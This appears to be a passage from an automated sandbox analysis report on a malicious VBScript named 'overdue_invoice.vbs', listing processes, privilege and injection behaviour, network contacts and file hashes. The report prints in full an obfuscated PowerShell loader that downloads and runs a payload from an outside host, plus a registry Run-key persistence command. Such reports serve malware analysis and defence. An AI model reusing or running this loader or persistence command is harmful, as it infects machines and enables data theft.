| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\overdue_invoice.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Stigereols147 = 1;Function Acarpelous($refried){$Oisen=$refried.Length-$Stigereols147;$Kredsret='Substring';For( $Simulationerne=5;$Simulationerne -lt $Oisen;$Simulationerne+=6){$Kassestrimlen+=$refried.$Kredsret.Invoke( $Simulationerne, $Stigereols147);}$Kassestrimlen;}function Sulfide($Honning){ . ($Rorgngeres204) ($Honning);}$Illumination=Acarpelous 'Je,miMSpor oInkohzGivenipalsilBerlil ParaaGaslo/Thers5,uman.Provi0 Mumm mid,(Geoc,W Jul iBit,enYtterdOdiseoh.gstwStukkschill ,rodNpenisT Cowl Exhib1Dknin0Udpla.super0Toldk;Sul o nostrWCreopiUd rin Bum 6Br ds4 Eras;Peric Ah,hox Le,c6laxat4Vider;relat Zaca.r nedkvBrod,:Trira1S.atu2d,str1S bin.Br.ak0Desa ) Filu UnknoG Fea,eFluthcNakkek MissoRespo/Struc2Halfp0S,ill1 farv0parag0 Hand1 Aq,i0Nond.1esu.i IndivFE mesiOverdrIndiseBlit fHovedo MappxAngel/Dick 1Toure2Brode1Toena.Moist0Gaffe ';$feststemning=Acarpelous 'To,arUSnefosFiraaePlimsrEpico-GenneA ,hargBagsieGu vmnAnimatSubst ';$Prominences=Acarpelous 'Ja kahRe,akt Decot AncopUncomsElaeo:Umenn/F,kke/E.istwMaanew HemmwRatch.Monopideglun .utonPseu oCemenv IndgaRarettMirabiWagewv Klase Firmb MauvuClou,iMultil,ercud Insti F kans kkygAr,ansslangospilplunperuN.gattCrocoiHartloSer,inInco.sJumbo. ForviReplynExtra/,hokowudvi pKlu.d-,lushcSka,eoLegion Tript polyeSnobbnEkspetFo.mn/SolbluDe.umpStrubl UnhooBistaa SulpdPureesUrina/perl,gM.wchrOpfosaRegisvanisoikvanttFrokoyDefo,_UnbehfSmd,doTheavr Im.amR.evosan va/steerhAnten/KlapjdNymph/.vrdebIndst/Us gegSpr,n/VassiUUkonvdBaguepUnverlRaspbaSkrignKabletLyv knAdveniRigelnAfsvegHvir,eRets,nGravm.Deod,u Trol3Ptole2Byg,e ';$Romanbladsstil199=Acarpelous 'Non.n>Reall ';$Rorgngeres204=Acarpelous 'Elefai Te.teVegetxEn ar ';$Pruderies71='Federalistisk';$Springdanses = Acarpelous 'Hjerte Ba.dcTnkemhStberoMonon ,amme%Recoma V,jlpTranepG lledBefo,aDeplatbrneeamoist%N fig\ConfeS,ariekBeflerWhalemHast.eBesnatforsk.AttenKGavltlBe.iei Nonp Ticto&Unrel&Kotwa Ejac,eFhovecpr enh ransoBdell Skrnetaaret ';Sulfide (Acarpelous 'Ques $ Chipg PudelSlf,noFlussbha noaUntralEtymo:SkakmHExtraoIldfumRektoouafklg ,unaeJordnnTelegeUge aoUnagiuaftalsGyl en Ligne a tesDis,isCoxale Undes cada= niv(AdkomcUnc,ymUnde dSumpt Toyma/Filibc,anca Dueho$ElinoSFuldsp Ace,r lutbiUdrednTngergForwad Dr.laNonaunRe.ols ,eceeImmunsNed.j)Skotj ');Sulfide (Acarpelous ' Bain$Re.ragT.verlB.nego Vissb Mee aTr,inlBetje:Cuckonbrys,rNrmesiTervan revegPolycs BlokbEr.iar CalaeChandvBrudge O ernUdfaneDesmo=raptu$Br ndP lfodr ,impoEn otm dditi igurnLejdeeFeodanOospocforudeSpytssGrips.Trivas AreapFamillKodesiAfdmptunrec(Hunde$Z.mopR gelaoB.figmHeadeaIncepnAtelobAmmunlHundeaT illdIsdansTorc,sMannatVoussiWo,sll Bide1Parge9Scrie9 Yami)tyran ');$Prominences=$nringsbrevene[0];$Nondeformity= (Acarpelous 'T.ktr$Triecg,ondolBo,yboTransbBackgaNegerlSmok,:.burgRMinimeOvermpOp.aviBank.qstanduMilieiVejr nCommogBefol=OvertN BetreStudiwThree-KildeO.utpubAksiaj KkkeeGennecNephrtVilje SuboSUdpeny B.ttsSkrmttLat,eeflivvmb,ufr.FolkeN Fin,eStuditChefk.Bair WMarchePre.rbGeoboCVaccilBoutfiunemoeGlasknTeglst');$Nondeformity+=$Homogeneousnesses[1];Sulfide ($Nondeformity);Sulfide (Acarpelous ' psti$RegioRTroskePissap TingiAn.icqGeninuTam yiHykl nIllingFoxed.GalloH SlipeArmitahuslgdFlageeIsidorIambisMod.r[sandh$NomasfChance Kin.sTremotgametsCot.ltJet ieslingm Naegn PurpiSocianoplseg Stjk] Ek.t=Con,i$ReassIunparl,ngaglFolkeuPluvim In.biKrigsnTumpeaFaitetGhettiTaffeoH slinNonth ');$Betnkning=Acarpelous 'Neg e$Text RKitleeUnderp OrthiAgtsoqAn.gau.trikiRhyminMaintgIn.er.MhedeDInkasoC kerwSeks,n Ildkl CircoNonpraUbetadArbejFStiftiB.egelRetinePi,op(Sdest$Lag aPMaturrMellaoKighumUnderiahousnKapitePondanAc.ckc,ogeneGrappsFigh,,Ritua$ArmounT ylle CorrwF,eddiPrangeOlfac) Velk ';$newie=$Homogeneousnesses[0];Sulfide (Acarpelous 'Halvp$AllicgScl,rlSki,fotric,bElitaaSlav,lPheny:Ree aEpreclflilj.tCeveneAarsorErhvem TimeoKonomd OuthnI.olaiWitchnPeriggCardieHianar asianCausteC rot=Necr (MurenTEksameMonotsSt rltOutbo- NonsPS,ruma tilstMacr.hSemid Fina $RecodnRetsveMet.lwCottoiObligePetro)Betaf ');while (!$Eftermodningerne) {Sulfide (Acarpelous 'Regis$Unsusg hairlRhibioSleekbps udaMystilNek,b:ErhveBPhenoe zuccnJoshicImpr hUndec=Gt.fd$Ski.nt.utbirTr riuOps,meRish. ') ;Sulfide $Betnkning;Sulfide (Acarpelous 'geogrSAut,rtExtraaRadiorKitaktMison-,reotS aurlS.xofeSi,gleDrearp mo,o S,ill4Antro ');Sulfide (Acarpelous 'skval$.ebragTildelFusaro ErhvbOmbytaHypotlForbe:Coen.EForsgf IkratHrfreeSensirApropm Rakeo Un,xd precnBrkkei efeanSkrifgPinnaeOpinarHetern PneueSulfo=Gulsp( Os.iTGene,eF rstsw.isttFunkt-ProrhPIndkoaPseudt G,ldhAfroh Sk at$StaminViljeeUnderwRearriTr.wle oldf)Anlbs ') ;Sulfide (Acarpelous ' Olie$BloksgUnderlBairnoHelleb tjgeaDroemlDetri: JudaScalviuYderlbSpiraaAlarmlTa,eaa HandrModery sy,h=Carib$S,lvugUddeblBornaoWe nib Arbea tv dlKalkb:Cell.AbravokJolletBrydeaId.emnBefritS jsim J meoSpecidChiefeUtjenl.ovedlBeworeEnergrAmpel+G,uli+Laa e% Tok.$MembrnBgersrteoreiLi innTachygSynsvssprogb H,terRaceteRensev IndseGtemanMageseDi,si.BirnacAbalaoGantzuSkattn M.totmi.ro ') ;$Prominences=$nringsbrevene[$Subalary];}$Grdris=340707;$Filtraters=28431;Sulfide (Acarpelous 'unsup$ ProggFedtelAfkogoEmpirb K keaDaktyl Gom :E,dodJHuldsoRegnsuNowsorVid on Risoa Na ulDial.iDebatsselefeKalder KrysiLuftfn Colog AchisMor esOptagyHornssAlliktAlfoneStickmDesti Spri,=T.adi SkilGSkraae Parat Wien- El,cCtrophoSheddnBrigitResineApokanOplyst Melo Ogal,$ Pup,nShitte Tromw,lidfiBj.ine ooti ');Sulfide (Acarpelous ' Stig$CognogKasseluntraoLandbb MentaDeduclMokop: DoriTChocko SumexA,resiAs,aypM scrhUnd roFrailbunforiVest.aHuckl Vivia=Skram Subso[NazieSBitcoysurclsEm.rgtFol.eeReshomPromi.P senC Sky.oNeonrn berevCrable Talnr AnaptAllon]Syphi:Phyll:sy teF ,jakrTrituoscaphmRostrBSprjtaAttensP romePatri6Bogme4 ZoonSPa.pytSupe,rSiksai Chann ShacgLo,ns( larl$TephrJRrt.goBriaruLikinrF.rdenRegeaaReci lAwakeiPreshssu eretndesr AfstiLowpan VaregBordbs Arc,sUhomoyDellss,econtmeline,jtidmmoney)stift ');Sulfide (Acarpelous 'Rets,$ olangMcguilgrou oAgrosbObseraFantolRigsa:Renhog PsycacountfMaa ef Au oe B,sslPitheeClassnUltrasHvorb Kist=.aget Sarce[A.bedSfilasytyktasU dattPeniteFall,mTilra. SgeoT PrieeAvoidxRetrat P ro. Pl.nE.demanSmaabcRgbomoTe rndMotiviKvartn BraggKerit]Outbr: Urte: BestACouncSSecu.CTern.I OldbI,nsta.,onraGAg ree De atRe,urS elintEi.htrRetski,nternCanvagmaale(Ly.ns$BlomsTAphyroSufflx.ecidiHarlepAnti hMignioPol.rbFortri ullaaloomf)Bran, ');Sulfide (Acarpelous ',ndfr$Fluatgre,lplNy edoMetembIlliqa VilllReolp: AgteNRundho GennnforeptKojikoUnvicrBrenntGun,tuNazifoGeisauFourdsChum.=Non.x$Indigg Un,raEjectf VuggfR.tsheOli olOv rpeFolken Grapsf,imr.,iskosFor.yuMark b lugsSlidst Hjerr.utleiCovennTunnegF okk(Wille$OplgnG SyngrAggredEru,erDropliVita s Vaab, ekst$ sociF ThymiZach,lDrejet BedorOptrya ,nartUtopieExuberQuatesMigsh) Anti ');Sulfide $Nontortuous;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Skrmet.Kli && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Stigereols147 = 1;Function Acarpelous($refried){$Oisen=$refried.Length-$Stigereols147;$Kredsret='Substring';For( $Simulationerne=5;$Simulationerne -lt $Oisen;$Simulationerne+=6){$Kassestrimlen+=$refried.$Kredsret.Invoke( $Simulationerne, $Stigereols147);}$Kassestrimlen;}function Sulfide($Honning){ . ($Rorgngeres204) ($Honning);}$Illumination=Acarpelous 'Je,miMSpor oInkohzGivenipalsilBerlil ParaaGaslo/Thers5,uman.Provi0 Mumm mid,(Geoc,W Jul iBit,enYtterdOdiseoh.gstwStukkschill ,rodNpenisT Cowl Exhib1Dknin0Udpla.super0Toldk;Sul o nostrWCreopiUd rin Bum 6Br ds4 Eras;Peric Ah,hox Le,c6laxat4Vider;relat Zaca.r nedkvBrod,:Trira1S.atu2d,str1S bin.Br.ak0Desa ) Filu UnknoG Fea,eFluthcNakkek MissoRespo/Struc2Halfp0S,ill1 farv0parag0 Hand1 Aq,i0Nond.1esu.i IndivFE mesiOverdrIndiseBlit fHovedo MappxAngel/Dick 1Toure2Brode1Toena.Moist0Gaffe ';$feststemning=Acarpelous 'To,arUSnefosFiraaePlimsrEpico-GenneA ,hargBagsieGu vmnAnimatSubst ';$Prominences=Acarpelous 'Ja kahRe,akt Decot AncopUncomsElaeo:Umenn/F,kke/E.istwMaanew HemmwRatch.Monopideglun .utonPseu oCemenv IndgaRarettMirabiWagewv Klase Firmb MauvuClou,iMultil,ercud Insti F kans kkygAr,ansslangospilplunperuN.gattCrocoiHartloSer,inInco.sJumbo. ForviReplynExtra/,hokowudvi pKlu.d-,lushcSka,eoLegion Tript polyeSnobbnEkspetFo.mn/SolbluDe.umpStrubl UnhooBistaa SulpdPureesUrina/perl,gM.wchrOpfosaRegisvanisoikvanttFrokoyDefo,_UnbehfSmd,doTheavr Im.amR.evosan va/steerhAnten/KlapjdNymph/.vrdebIndst/Us gegSpr,n/VassiUUkonvdBaguepUnverlRaspbaSkrignKabletLyv knAdveniRigelnAfsvegHvir,eRets,nGravm.Deod,u Trol3Ptole2Byg,e ';$Romanbladsstil199=Acarpelous 'Non.n>Reall ';$Rorgngeres204=Acarpelous 'Elefai Te.teVegetxEn ar ';$Pruderies71='Federalistisk';$Springdanses = Acarpelous 'Hjerte Ba.dcTnkemhStberoMonon ,amme%Recoma V,jlpTranepG lledBefo,aDeplatbrneeamoist%N fig\ConfeS,ariekBeflerWhalemHast.eBesnatforsk.AttenKGavltlBe.iei Nonp Ticto&Unrel&Kotwa Ejac,eFhovecpr enh ransoBdell Skrnetaaret ';Sulfide (Acarpelous 'Ques $ Chipg PudelSlf,noFlussbha noaUntralEtymo:SkakmHExtraoIldfumRektoouafklg ,unaeJordnnTelegeUge aoUnagiuaftalsGyl en Ligne a tesDis,isCoxale Undes cada= niv(AdkomcUnc,ymUnde dSumpt Toyma/Filibc,anca Dueho$ElinoSFuldsp Ace,r lutbiUdrednTngergForwad Dr.laNonaunRe.ols ,eceeImmunsNed.j)Skotj ');Sulfide (Acarpelous ' Bain$Re.ragT.verlB.nego Vissb Mee aTr,inlBetje:Cuckonbrys,rNrmesiTervan revegPolycs BlokbEr.iar CalaeChandvBrudge O ernUdfaneDesmo=raptu$Br ndP lfodr ,impoEn otm dditi igurnLejdeeFeodanOospocforudeSpytssGrips.Trivas AreapFamillKodesiAfdmptunrec(Hunde$Z.mopR gelaoB.figmHeadeaIncepnAtelobAmmunlHundeaT illdIsdansTorc,sMannatVoussiWo,sll Bide1Parge9Scrie9 Yami)tyran ');$Prominences=$nringsbrevene[0];$Nondeformity= (Acarpelous 'T.ktr$Triecg,ondolBo,yboTransbBackgaNegerlSmok,:.burgRMinimeOvermpOp.aviBank.qstanduMilieiVejr nCommogBefol=OvertN BetreStudiwThree-KildeO.utpubAksiaj KkkeeGennecNephrtVilje SuboSUdpeny B.ttsSkrmttLat,eeflivvmb,ufr.FolkeN Fin,eStuditChefk.Bair WMarchePre.rbGeoboCVaccilBoutfiunemoeGlasknTeglst');$Nondeformity+=$Homogeneousnesses[1];Sulfide ($Nondeformity);Sulfide (Acarpelous ' psti$RegioRTroskePissap TingiAn.icqGeninuTam yiHykl nIllingFoxed.GalloH SlipeArmitahuslgdFlageeIsidorIambisMod.r[sandh$NomasfChance Kin.sTremotgametsCot.ltJet ieslingm Naegn PurpiSocianoplseg Stjk] Ek.t=Con,i$ReassIunparl,ngaglFolkeuPluvim In.biKrigsnTumpeaFaitetGhettiTaffeoH slinNonth ');$Betnkning=Acarpelous 'Neg e$Text RKitleeUnderp OrthiAgtsoqAn.gau.trikiRhyminMaintgIn.er.MhedeDInkasoC kerwSeks,n Ildkl CircoNonpraUbetadArbejFStiftiB.egelRetinePi,op(Sdest$Lag aPMaturrMellaoKighumUnderiahousnKapitePondanAc.ckc,ogeneGrappsFigh,,Ritua$ArmounT ylle CorrwF,eddiPrangeOlfac) Velk ';$newie=$Homogeneousnesses[0];Sulfide (Acarpelous 'Halvp$AllicgScl,rlSki,fotric,bElitaaSlav,lPheny:Ree aEpreclflilj.tCeveneAarsorErhvem TimeoKonomd OuthnI.olaiWitchnPeriggCardieHianar asianCausteC rot=Necr (MurenTEksameMonotsSt rltOutbo- NonsPS,ruma tilstMacr.hSemid Fina $RecodnRetsveMet.lwCottoiObligePetro)Betaf ');while (!$Eftermodningerne) {Sulfide (Acarpelous 'Regis$Unsusg hairlRhibioSleekbps udaMystilNek,b:ErhveBPhenoe zuccnJoshicImpr hUndec=Gt.fd$Ski.nt.utbirTr riuOps,meRish. ') ;Sulfide $Betnkning;Sulfide (Acarpelous 'geogrSAut,rtExtraaRadiorKitaktMison-,reotS aurlS.xofeSi,gleDrearp mo,o S,ill4Antro ');Sulfide (Acarpelous 'skval$.ebragTildelFusaro ErhvbOmbytaHypotlForbe:Coen.EForsgf IkratHrfreeSensirApropm Rakeo Un,xd precnBrkkei efeanSkrifgPinnaeOpinarHetern PneueSulfo=Gulsp( Os.iTGene,eF rstsw.isttFunkt-ProrhPIndkoaPseudt G,ldhAfroh Sk at$StaminViljeeUnderwRearriTr.wle oldf)Anlbs ') ;Sulfide (Acarpelous ' Olie$BloksgUnderlBairnoHelleb tjgeaDroemlDetri: JudaScalviuYderlbSpiraaAlarmlTa,eaa HandrModery sy,h=Carib$S,lvugUddeblBornaoWe nib Arbea tv dlKalkb:Cell.AbravokJolletBrydeaId.emnBefritS jsim J meoSpecidChiefeUtjenl.ovedlBeworeEnergrAmpel+G,uli+Laa e% Tok.$MembrnBgersrteoreiLi innTachygSynsvssprogb H,terRaceteRensev IndseGtemanMageseDi,si.BirnacAbalaoGantzuSkattn M.totmi.ro ') ;$Prominences=$nringsbrevene[$Subalary];}$Grdris=340707;$Filtraters=28431;Sulfide (Acarpelous 'unsup$ ProggFedtelAfkogoEmpirb K keaDaktyl Gom :E,dodJHuldsoRegnsuNowsorVid on Risoa Na ulDial.iDebatsselefeKalder KrysiLuftfn Colog AchisMor esOptagyHornssAlliktAlfoneStickmDesti Spri,=T.adi SkilGSkraae Parat Wien- El,cCtrophoSheddnBrigitResineApokanOplyst Melo Ogal,$ Pup,nShitte Tromw,lidfiBj.ine ooti ');Sulfide (Acarpelous ' Stig$CognogKasseluntraoLandbb MentaDeduclMokop: DoriTChocko SumexA,resiAs,aypM scrhUnd roFrailbunforiVest.aHuckl Vivia=Skram Subso[NazieSBitcoysurclsEm.rgtFol.eeReshomPromi.P senC Sky.oNeonrn berevCrable Talnr AnaptAllon]Syphi:Phyll:sy teF ,jakrTrituoscaphmRostrBSprjtaAttensP romePatri6Bogme4 ZoonSPa.pytSupe,rSiksai Chann ShacgLo,ns( larl$TephrJRrt.goBriaruLikinrF.rdenRegeaaReci lAwakeiPreshssu eretndesr AfstiLowpan VaregBordbs Arc,sUhomoyDellss,econtmeline,jtidmmoney)stift ');Sulfide (Acarpelous 'Rets,$ olangMcguilgrou oAgrosbObseraFantolRigsa:Renhog PsycacountfMaa ef Au oe B,sslPitheeClassnUltrasHvorb Kist=.aget Sarce[A.bedSfilasytyktasU dattPeniteFall,mTilra. SgeoT PrieeAvoidxRetrat P ro. Pl.nE.demanSmaabcRgbomoTe rndMotiviKvartn BraggKerit]Outbr: Urte: BestACouncSSecu.CTern.I OldbI,nsta.,onraGAg ree De atRe,urS elintEi.htrRetski,nternCanvagmaale(Ly.ns$BlomsTAphyroSufflx.ecidiHarlepAnti hMignioPol.rbFortri ullaaloomf)Bran, ');Sulfide (Acarpelous ',ndfr$Fluatgre,lplNy edoMetembIlliqa VilllReolp: AgteNRundho GennnforeptKojikoUnvicrBrenntGun,tuNazifoGeisauFourdsChum.=Non.x$Indigg Un,raEjectf VuggfR.tsheOli olOv rpeFolken Grapsf,imr.,iskosFor.yuMark b lugsSlidst Hjerr.utleiCovennTunnegF okk(Wille$OplgnG SyngrAggredEru,erDropliVita s Vaab, ekst$ sociF ThymiZach,lDrejet BedorOptrya ,nartUtopieExuberQuatesMigsh) Anti ');Sulfide $Nontortuous;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Skrmet.Kli && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "tonsillectomic" /t REG_EXPAND_SZ /d "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\Codebtors\').Typeregningens;%Rundsavsbladene% ($sartor)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "tonsillectomic" /t REG_EXPAND_SZ /d "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\Codebtors\').Typeregningens;%Rundsavsbladene% ($sartor)"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.innovativebuildingsolutions.in | udp |
| IN | 103.21.58.98:443 | www.innovativebuildingsolutions.in | tcp |
| IN | 103.21.58.98:443 | www.innovativebuildingsolutions.in | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
Files
memory/2156-4-0x000007FEF5F7E000-0x000007FEF5F7F000-memory.dmp
memory/2156-5-0x000000001B5F0000-0x000000001B8D2000-memory.dmp
memory/2156-6-0x00000000027A0000-0x00000000027A8000-memory.dmp
memory/2156-8-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp
memory/2156-7-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp
memory/2156-9-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp
memory/2156-10-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6J4520554E2X6SS5OMAQ.temp
| MD5 | a827ff99cbccfab8cc86b1c1fecc9021 |
| SHA1 | 911690184d451687ed5fa08601a9b93387ac97b5 |
| SHA256 | 262b2a2744c9e11590a9659239470480c3f690ade183679cb9914a9e4cc88594 |
| SHA512 | 9e89423da63c455fe9d5ed715f8dd917826a849f372b09546473593efe117b7719aeb5fab180d0ed0ec1ee4495ef2717e460b21c7a453d0273c2bcd4b6e0179f |
C:\Users\Admin\AppData\Roaming\Skrmet.Kli
| MD5 | 9916e5a5f7afe8c1f861f93999a875f3 |
| SHA1 | 8d1f119fcb5942cd8e71f3bb1fc527c2a74549cc |
| SHA256 | 97cebd696b9e5587ba0a101e2cdabf9bf01ab268d354408fdc349085760579df |
| SHA512 | 30b0c3b929218288998b7578672872d84e5fd810543b77de153033b491b0dd9472ccaa711b448fcbd9ccc9a67888e3439aeea5d1c13b2860f1f480a325a24edc |
memory/2156-16-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp
memory/1964-17-0x0000000006680000-0x000000000A2DC000-memory.dmp
memory/2156-18-0x000007FEF5F7E000-0x000007FEF5F7F000-memory.dmp
memory/2112-32-0x0000000000AC0000-0x0000000001B22000-memory.dmp
memory/2156-33-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp
memory/2112-34-0x0000000000AC0000-0x0000000000B00000-memory.dmp